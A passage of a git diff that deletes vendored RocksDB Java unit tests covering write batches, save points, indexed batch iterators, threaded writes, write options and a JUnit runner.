-      assertThat(b1.count()).isEqualTo(2);
-      b2.remove("foo".getBytes("US-ASCII"));
-      WriteBatchTestInternalHelper.append(b1, b2);
-      assertThat(("Put(a, va)@200" +
-          "Put(b, vb)@202" +
-          "Put(b, vb)@201" +
-          "Delete(foo)@203")
-          .equals(new String(getContents(b1), "US-ASCII")));
-      assertThat(b1.count()).isEqualTo(4);
-    }
-  }
-
-  @Test
-  public void blobOperation()
-      throws UnsupportedEncodingException {
-    try (final WriteBatch batch = new WriteBatch()) {
-      batch.put("k1".getBytes("US-ASCII"), "v1".getBytes("US-ASCII"));
-      batch.put("k2".getBytes("US-ASCII"), "v2".getBytes("US-ASCII"));
-      batch.put("k3".getBytes("US-ASCII"), "v3".getBytes("US-ASCII"));
-      batch.putLogData("blob1".getBytes("US-ASCII"));
-      batch.remove("k2".getBytes("US-ASCII"));
-      batch.putLogData("blob2".getBytes("US-ASCII"));
-      batch.merge("foo".getBytes("US-ASCII"), "bar".getBytes("US-ASCII"));
-      assertThat(batch.count()).isEqualTo(5);
-      assertThat(("Merge(foo, bar)@4" +
-          "Put(k1, v1)@0" +
-          "Delete(k2)@3" +
-          "Put(k2, v2)@1" +
-          "Put(k3, v3)@2")
-          .equals(new String(getContents(batch), "US-ASCII")));
-    }
-  }
-
-  @Test
-  public void savePoints()
-      throws UnsupportedEncodingException, RocksDBException {
-    try (final WriteBatch batch = new WriteBatch()) {
-      batch.put("k1".getBytes("US-ASCII"), "v1".getBytes("US-ASCII"));
-      batch.put("k2".getBytes("US-ASCII"), "v2".getBytes("US-ASCII"));
-      batch.put("k3".getBytes("US-ASCII"), "v3".getBytes("US-ASCII"));
-
-      assertThat(getFromWriteBatch(batch, "k1")).isEqualTo("v1");
-      assertThat(getFromWriteBatch(batch, "k2")).isEqualTo("v2");
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3");
-
-
-      batch.setSavePoint();
-
-      batch.remove("k2".getBytes("US-ASCII"));
-      batch.put("k3".getBytes("US-ASCII"), "v3-2".getBytes("US-ASCII"));
-
-      assertThat(getFromWriteBatch(batch, "k2")).isNull();
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3-2");
-
-
-      batch.setSavePoint();
-
-      batch.put("k3".getBytes("US-ASCII"), "v3-3".getBytes("US-ASCII"));
-      batch.put("k4".getBytes("US-ASCII"), "v4".getBytes("US-ASCII"));
-
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3-3");
-      assertThat(getFromWriteBatch(batch, "k4")).isEqualTo("v4");
-
-
-      batch.rollbackToSavePoint();
-
-      assertThat(getFromWriteBatch(batch, "k2")).isNull();
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3-2");
-      assertThat(getFromWriteBatch(batch, "k4")).isNull();
-
-
-      batch.rollbackToSavePoint();
-
-      assertThat(getFromWriteBatch(batch, "k1")).isEqualTo("v1");
-      assertThat(getFromWriteBatch(batch, "k2")).isEqualTo("v2");
-      assertThat(getFromWriteBatch(batch, "k3")).isEqualTo("v3");
-      assertThat(getFromWriteBatch(batch, "k4")).isNull();
-    }
-  }
-
-  @Test
-  public void deleteRange() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      db.put("key3".getBytes(), "abcdefg".getBytes());
-      db.put("key4".getBytes(), "xyz".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("12345678".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("abcdefg".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-
-      WriteBatch batch = new WriteBatch();
-      batch.deleteRange("key2".getBytes(), "key4".getBytes());
-      db.write(new WriteOptions(), batch);
-
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isNull();
-      assertThat(db.get("key3".getBytes())).isNull();
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints() throws RocksDBException {
-    try (final WriteBatch batch = new WriteBatch()) {
-      batch.rollbackToSavePoint();
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints_nested() throws RocksDBException {
-    try (final WriteBatch batch = new WriteBatch()) {
-
-      batch.setSavePoint();
-      batch.rollbackToSavePoint();
-
-      // without previous corresponding setSavePoint
-      batch.rollbackToSavePoint();
-    }
-  }
-
-  static byte[] getContents(final WriteBatch wb) {
-    return getContents(wb.nativeHandle_);
-  }
-
-  static String getFromWriteBatch(final WriteBatch wb, final String key)
-      throws RocksDBException, UnsupportedEncodingException {
-    final WriteBatchGetter getter =
-        new WriteBatchGetter(key.getBytes("US-ASCII"));
-    wb.iterate(getter);
-    if(getter.getValue() != null) {
-      return new String(getter.getValue(), "US-ASCII");
-    } else {
-      return null;
-    }
-  }
-
-  private static native byte[] getContents(final long writeBatchHandle);
-
-  private static class WriteBatchGetter extends WriteBatch.Handler {
-
-    private final byte[] key;
-    private byte[] value;
-
-    public WriteBatchGetter(final byte[] key) {
-      this.key = key;
-    }
-
-    public byte[] getValue() {
-      return value;
-    }
-
-    @Override
-    public void put(final byte[] key, final byte[] value) {
-      if(Arrays.equals(this.key, key)) {
-        this.value = value;
-      }
-    }
-
-    @Override
-    public void merge(final byte[] key, final byte[] value) {
-      if(Arrays.equals(this.key, key)) {
-        throw new UnsupportedOperationException();
-      }
-    }
-
-    @Override
-    public void delete(final byte[] key) {
-      if(Arrays.equals(this.key, key)) {
-        this.value = null;
-      }
-    }
-
-    @Override
-    public void deleteRange(final byte[] beginKey, final byte[] endKey) {
-      throw new UnsupportedOperationException();
-    }
-
-    @Override
-    public void logData(final byte[] blob) {
-    }
-  }
-}
-
-/**
- * Package-private class which provides java api to access
- * c++ WriteBatchInternal.
- */
-class WriteBatchTestInternalHelper {
-  static void setSequence(final WriteBatch wb, final long sn) {
-    setSequence(wb.nativeHandle_, sn);
-  }
-
-  static long sequence(final WriteBatch wb) {
-    return sequence(wb.nativeHandle_);
-  }
-
-  static void append(final WriteBatch wb1, final WriteBatch wb2) {
-    append(wb1.nativeHandle_, wb2.nativeHandle_);
-  }
-
-  private static native void setSequence(final long writeBatchHandle,
-      final long sn);
-
-  private static native long sequence(final long writeBatchHandle);
-
-  private static native void append(final long writeBatchHandle1,
-      final long writeBatchHandle2);
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
deleted file mode 100644
index c5090db..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java
+++ /dev/null
@@ -1,104 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.junit.runner.RunWith;
-import org.junit.runners.Parameterized;
-import org.junit.runners.Parameterized.Parameter;
-import org.junit.runners.Parameterized.Parameters;
-
-import java.nio.ByteBuffer;
-import java.util.*;
-import java.util.concurrent.*;
-
-@RunWith(Parameterized.class)
-public class WriteBatchThreadedTest {
-
-  @Parameters(name = "WriteBatchThreadedTest(threadCount={0})")
-  public static Iterable<Integer> data() {
-    return Arrays.asList(new Integer[]{1, 10, 50, 100});
-  }
-
-  @Parameter
-  public int threadCount;
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  RocksDB db;
-
-  @Before
-  public void setUp() throws Exception {
-    RocksDB.loadLibrary();
-    final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setIncreaseParallelism(32);
-    db = RocksDB.open(options, dbFolder.getRoot().getAbsolutePath());
-    assert (db != null);
-  }
-
-  @After
-  public void tearDown() throws Exception {
-    if (db != null) {
-      db.close();
-    }
-  }
-
-  @Test
-  public void threadedWrites() throws InterruptedException, ExecutionException {
-    final List<Callable<Void>> callables = new ArrayList<>();
-    for (int i = 0; i < 100; i++) {
-      final int offset = i * 100;
-      callables.add(new Callable<Void>() {
-        @Override
-        public Void call() throws RocksDBException {
-          try (final WriteBatch wb = new WriteBatch();
-               final WriteOptions w_opt = new WriteOptions()) {
-            for (int i = offset; i < offset + 100; i++) {
-              wb.put(ByteBuffer.allocate(4).putInt(i).array(), "parallel rocks test".getBytes());
-            }
-            db.write(w_opt, wb);
-          }
-          return null;
-        }
-      });
-    }
-
-    //submit the callables
-    final ExecutorService executorService =
-        Executors.newFixedThreadPool(threadCount);
-    try {
-      final ExecutorCompletionService<Void> completionService =
-          new ExecutorCompletionService<>(executorService);
-      final Set<Future<Void>> futures = new HashSet<>();
-      for (final Callable<Void> callable : callables) {
-        futures.add(completionService.submit(callable));
-      }
-
-      while (futures.size() > 0) {
-        final Future<Void> future = completionService.take();
-        futures.remove(future);
-
-        try {
-          future.get();
-        } catch (final ExecutionException e) {
-          for (final Future<Void> f : futures) {
-            f.cancel(true);
-          }
-
-          throw e;
-        }
-      }
-    } finally {
-      executorService.shutdown();
-      executorService.awaitTermination(10, TimeUnit.SECONDS);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
deleted file mode 100644
index 1c5e342..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java
+++ /dev/null
@@ -1,410 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.UnsupportedEncodingException;
-import java.nio.ByteBuffer;
-import java.util.Arrays;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-
-public class WriteBatchWithIndexTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void readYourOwnWrites() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] k1 = "key1".getBytes();
-      final byte[] v1 = "value1".getBytes();
-      final byte[] k2 = "key2".getBytes();
-      final byte[] v2 = "value2".getBytes();
-
-      db.put(k1, v1);
-      db.put(k2, v2);
-
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-           final RocksIterator base = db.newIterator();
-           final RocksIterator it = wbwi.newIteratorWithBase(base)) {
-
-        it.seek(k1);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k1);
-        assertThat(it.value()).isEqualTo(v1);
-
-        it.seek(k2);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k2);
-        assertThat(it.value()).isEqualTo(v2);
-
-        //put data to the write batch and make sure we can read it.
-        final byte[] k3 = "key3".getBytes();
-        final byte[] v3 = "value3".getBytes();
-        wbwi.put(k3, v3);
-        it.seek(k3);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k3);
-        assertThat(it.value()).isEqualTo(v3);
-
-        //update k2 in the write batch and check the value
-        final byte[] v2Other = "otherValue2".getBytes();
-        wbwi.put(k2, v2Other);
-        it.seek(k2);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k2);
-        assertThat(it.value()).isEqualTo(v2Other);
-
-        //remove k1 and make sure we can read back the write
-        wbwi.remove(k1);
-        it.seek(k1);
-        assertThat(it.key()).isNotEqualTo(k1);
-
-        //reinsert k1 and make sure we see the new value
-        final byte[] v1Other = "otherValue1".getBytes();
-        wbwi.put(k1, v1Other);
-        it.seek(k1);
-        assertThat(it.isValid()).isTrue();
-        assertThat(it.key()).isEqualTo(k1);
-        assertThat(it.value()).isEqualTo(v1Other);
-      }
-    }
-  }
-
-  @Test
-  public void write_writeBatchWithIndex() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      final byte[] k1 = "key1".getBytes();
-      final byte[] v1 = "value1".getBytes();
-      final byte[] k2 = "key2".getBytes();
-      final byte[] v2 = "value2".getBytes();
-
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex()) {
-        wbwi.put(k1, v1);
-        wbwi.put(k2, v2);
-
-        db.write(new WriteOptions(), wbwi);
-      }
-
-      assertThat(db.get(k1)).isEqualTo(v1);
-      assertThat(db.get(k2)).isEqualTo(v2);
-    }
-  }
-
-  @Test
-  public void iterator() throws RocksDBException {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true)) {
-
-      final String k1 = "key1";
-      final String v1 = "value1";
-      final String k2 = "key2";
-      final String v2 = "value2";
-      final String k3 = "key3";
-      final String v3 = "value3";
-      final byte[] k1b = k1.getBytes();
-      final byte[] v1b = v1.getBytes();
-      final byte[] k2b = k2.getBytes();
-      final byte[] v2b = v2.getBytes();
-      final byte[] k3b = k3.getBytes();
-      final byte[] v3b = v3.getBytes();
-
-      //add put records
-      wbwi.put(k1b, v1b);
-      wbwi.put(k2b, v2b);
-      wbwi.put(k3b, v3b);
-
-      //add a deletion record
-      final String k4 = "key4";
-      final byte[] k4b = k4.getBytes();
-      wbwi.remove(k4b);
-
-      final WBWIRocksIterator.WriteEntry[] expected = {
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(k1), new DirectSlice(v1)),
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(k2), new DirectSlice(v2)),
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(k3), new DirectSlice(v3)),
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.DELETE,
-              new DirectSlice(k4), DirectSlice.NONE)
-      };
-
-      try (final WBWIRocksIterator it = wbwi.newIterator()) {
-        //direct access - seek to key offsets
-        final int[] testOffsets = {2, 0, 1, 3};
-
-        for (int i = 0; i < testOffsets.length; i++) {
-          final int testOffset = testOffsets[i];
-          final byte[] key = toArray(expected[testOffset].getKey().data());
-
-          it.seek(key);
-          assertThat(it.isValid()).isTrue();
-
-          final WBWIRocksIterator.WriteEntry entry = it.entry();
-          assertThat(entry.equals(expected[testOffset])).isTrue();
-        }
-
-        //forward iterative access
-        int i = 0;
-        for (it.seekToFirst(); it.isValid(); it.next()) {
-          assertThat(it.entry().equals(expected[i++])).isTrue();
-        }
-
-        //reverse iterative access
-        i = expected.length - 1;
-        for (it.seekToLast(); it.isValid(); it.prev()) {
-          assertThat(it.entry().equals(expected[i--])).isTrue();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void zeroByteTests() {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true)) {
-      final byte[] zeroByteValue = new byte[]{0, 0};
-      //add zero byte value
-      wbwi.put(zeroByteValue, zeroByteValue);
-
-      final ByteBuffer buffer = ByteBuffer.allocateDirect(zeroByteValue.length);
-      buffer.put(zeroByteValue);
-
-      final WBWIRocksIterator.WriteEntry expected =
-          new WBWIRocksIterator.WriteEntry(WBWIRocksIterator.WriteType.PUT,
-              new DirectSlice(buffer, zeroByteValue.length),
-              new DirectSlice(buffer, zeroByteValue.length));
-
-      try (final WBWIRocksIterator it = wbwi.newIterator()) {
-        it.seekToFirst();
-        final WBWIRocksIterator.WriteEntry actual = it.entry();
-        assertThat(actual.equals(expected)).isTrue();
-        assertThat(it.entry().hashCode() == expected.hashCode()).isTrue();
-      }
-    }
-  }
-
-  @Test
-  public void savePoints()
-      throws UnsupportedEncodingException, RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-           final ReadOptions readOptions = new ReadOptions()) {
-        wbwi.put("k1".getBytes(), "v1".getBytes());
-        wbwi.put("k2".getBytes(), "v2".getBytes());
-        wbwi.put("k3".getBytes(), "v3".getBytes());
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k1"))
-            .isEqualTo("v1");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isEqualTo("v2");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3");
-
-
-        wbwi.setSavePoint();
-
-        wbwi.remove("k2".getBytes());
-        wbwi.put("k3".getBytes(), "v3-2".getBytes());
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isNull();
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3-2");
-
-
-        wbwi.setSavePoint();
-
-        wbwi.put("k3".getBytes(), "v3-3".getBytes());
-        wbwi.put("k4".getBytes(), "v4".getBytes());
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3-3");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k4"))
-            .isEqualTo("v4");
-
-
-        wbwi.rollbackToSavePoint();
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isNull();
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3-2");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k4"))
-            .isNull();
-
-
-        wbwi.rollbackToSavePoint();
-
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k1"))
-            .isEqualTo("v1");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k2"))
-            .isEqualTo("v2");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k3"))
-            .isEqualTo("v3");
-        assertThat(getFromWriteBatchWithIndex(db, readOptions, wbwi, "k4"))
-            .isNull();
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints() throws RocksDBException {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex()) {
-      wbwi.rollbackToSavePoint();
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void restorePoints_withoutSavePoints_nested() throws RocksDBException {
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex()) {
-
-      wbwi.setSavePoint();
-      wbwi.rollbackToSavePoint();
-
-      // without previous corresponding setSavePoint
-      wbwi.rollbackToSavePoint();
-    }
-  }
-
-  private static String getFromWriteBatchWithIndex(final RocksDB db,
-      final ReadOptions readOptions, final WriteBatchWithIndex wbwi,
-      final String skey) {
-    final byte[] key = skey.getBytes();
-    try(final RocksIterator baseIterator = db.newIterator(readOptions);
-        final RocksIterator iterator = wbwi.newIteratorWithBase(baseIterator)) {
-      iterator.seek(key);
-
-      // Arrays.equals(key, iterator.key()) ensures an exact match in Rocks,
-      // instead of a nearest match
-      return iterator.isValid() &&
-          Arrays.equals(key, iterator.key()) ?
-          new String(iterator.value()) : null;
-    }
-  }
-
-  @Test
-  public void getFromBatch() throws RocksDBException {
-    final byte[] k1 = "k1".getBytes();
-    final byte[] k2 = "k2".getBytes();
-    final byte[] k3 = "k3".getBytes();
-    final byte[] k4 = "k4".getBytes();
-
-    final byte[] v1 = "v1".getBytes();
-    final byte[] v2 = "v2".getBytes();
-    final byte[] v3 = "v3".getBytes();
-
-    try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-         final DBOptions dbOptions = new DBOptions()) {
-      wbwi.put(k1, v1);
-      wbwi.put(k2, v2);
-      wbwi.put(k3, v3);
-
-      assertThat(wbwi.getFromBatch(dbOptions, k1)).isEqualTo(v1);
-      assertThat(wbwi.getFromBatch(dbOptions, k2)).isEqualTo(v2);
-      assertThat(wbwi.getFromBatch(dbOptions, k3)).isEqualTo(v3);
-      assertThat(wbwi.getFromBatch(dbOptions, k4)).isNull();
-
-      wbwi.remove(k2);
-
-      assertThat(wbwi.getFromBatch(dbOptions, k2)).isNull();
-    }
-  }
-
-  @Test
-  public void getFromBatchAndDB() throws RocksDBException {
-    final byte[] k1 = "k1".getBytes();
-    final byte[] k2 = "k2".getBytes();
-    final byte[] k3 = "k3".getBytes();
-    final byte[] k4 = "k4".getBytes();
-
-    final byte[] v1 = "v1".getBytes();
-    final byte[] v2 = "v2".getBytes();
-    final byte[] v3 = "v3".getBytes();
-    final byte[] v4 = "v4".getBytes();
-
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      db.put(k1, v1);
-      db.put(k2, v2);
-      db.put(k4, v4);
-
-      try (final WriteBatchWithIndex wbwi = new WriteBatchWithIndex(true);
-           final DBOptions dbOptions = new DBOptions();
-           final ReadOptions readOptions = new ReadOptions()) {
-
-        assertThat(wbwi.getFromBatch(dbOptions, k1)).isNull();
-        assertThat(wbwi.getFromBatch(dbOptions, k2)).isNull();
-        assertThat(wbwi.getFromBatch(dbOptions, k4)).isNull();
-
-        wbwi.put(k3, v3);
-
-        assertThat(wbwi.getFromBatch(dbOptions, k3)).isEqualTo(v3);
-
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k1)).isEqualTo(v1);
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k2)).isEqualTo(v2);
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k3)).isEqualTo(v3);
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k4)).isEqualTo(v4);
-
-        wbwi.remove(k4);
-
-        assertThat(wbwi.getFromBatchAndDB(db, readOptions, k4)).isNull();
-      }
-    }
-  }
-  private byte[] toArray(final ByteBuffer buf) {
-    final byte[] ary = new byte[buf.remaining()];
-    buf.get(ary);
-    return ary;
-  }
-
-  @Test
-  public void deleteRange() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      db.put("key3".getBytes(), "abcdefg".getBytes());
-      db.put("key4".getBytes(), "xyz".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("12345678".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("abcdefg".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-
-      WriteBatch batch = new WriteBatch();
-      batch.deleteRange("key2".getBytes(), "key4".getBytes());
-      db.write(new WriteOptions(), batch);
-
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isNull();
-      assertThat(db.get("key3".getBytes())).isNull();
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteOptionsTest.java
deleted file mode 100644
index 72a0687..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/WriteOptionsTest.java
+++ /dev/null
@@ -1,45 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class WriteOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void writeOptions() {
-    try (final WriteOptions writeOptions = new WriteOptions()) {
-
-      writeOptions.setSync(true);
-      assertThat(writeOptions.sync()).isTrue();
-      writeOptions.setSync(false);
-      assertThat(writeOptions.sync()).isFalse();
-
-      writeOptions.setDisableWAL(true);
-      assertThat(writeOptions.disableWAL()).isTrue();
-      writeOptions.setDisableWAL(false);
-      assertThat(writeOptions.disableWAL()).isFalse();
-
-
-      writeOptions.setIgnoreMissingColumnFamilies(true);
-      assertThat(writeOptions.ignoreMissingColumnFamilies()).isTrue();
-      writeOptions.setIgnoreMissingColumnFamilies(false);
-      assertThat(writeOptions.ignoreMissingColumnFamilies()).isFalse();
-
-      writeOptions.setNoSlowdown(true);
-      assertThat(writeOptions.noSlowdown()).isTrue();
-      writeOptions.setNoSlowdown(false);
-      assertThat(writeOptions.noSlowdown()).isFalse();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
deleted file mode 100644
index 02ad038..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java
+++ /dev/null
@@ -1,70 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb.test;
-
-import org.junit.internal.JUnitSystem;
-import org.junit.internal.RealSystem;
-import org.junit.internal.TextListener;
-import org.junit.runner.Description;
-import org.junit.runner.JUnitCore;
-import org.junit.runner.Result;
-
-import java.util.ArrayList;
-import java.util.List;
-
-/**
- * Custom Junit Runner to print also Test classes
- * and executed methods to command prompt.
- */
-public class RocksJunitRunner {
-
-  /**
-   * Listener which overrides default functionality
-   * to print class and method to system out.
-   */
-  static class RocksJunitListener extends TextListener {
-
-    /**
-     * RocksJunitListener constructor
-     *
-     * @param system JUnitSystem
-     */
-    public RocksJunitListener(final JUnitSystem system) {
-      super(system);
-    }
-
-    @Override
-    public void testStarted(final Description description) {
-       System.out.format("Run: %s testing now -> %s \n",
-           description.getClassName(),
-           description.getMethodName());
-    }
-  }
-
-  /**
-   * Main method to execute tests
-   *
-   * @param args Test classes as String names
-   */
-  public static void main(final String[] args){
-    final JUnitCore runner = new JUnitCore();
-    final JUnitSystem system = new RealSystem();
-    runner.addListener(new RocksJunitListener(system));
-    try {
-      final List<Class<?>> classes = new ArrayList<>();
-      for (final String arg : args) {
-        classes.add(Class.forName(arg));
-      }
-      final Class[] clazzes = classes.toArray(new Class[classes.size()]);
-      final Result result = runner.run(clazzes);
-      if(!result.wasSuccessful()) {
-        System.exit(-1);
-      }
-    } catch (final ClassNotFoundException e) {
-      e.printStackTrace();
-      System.exit(-2);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
deleted file mode 100644
index 42508bc..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
+++ /dev/null
@@ -1,480 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.junit.Test;
-import org.rocksdb.*;
-import org.rocksdb.Comparator;
-
-import java.io.IOException;
-import java.nio.charset.StandardCharsets;
-import java.nio.file.FileVisitResult;
-import java.nio.file.Files;
-import java.nio.file.Path;
-import java.nio.file.SimpleFileVisitor;
-import java.nio.file.attribute.BasicFileAttributes;
-import java.util.*;
-
-import static org.junit.Assert.*;
-
-/**
- * This is a direct port of various C++
- * tests from db/comparator_db_test.cc
- * and some code to adapt it to RocksJava
- */
-public class BytewiseComparatorTest {
-
-  /**
-   * Open the database using the C++ BytewiseComparatorImpl
-   * and test the results against our Java BytewiseComparator
-   */
-  @Test
-  public void java_vs_cpp_bytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir,
-          BuiltinComparator.BYTEWISE_COMPARATOR)) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new BytewiseComparator(new ComparatorOptions())),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the Java BytewiseComparator
-   * and test the results against another Java BytewiseComparator
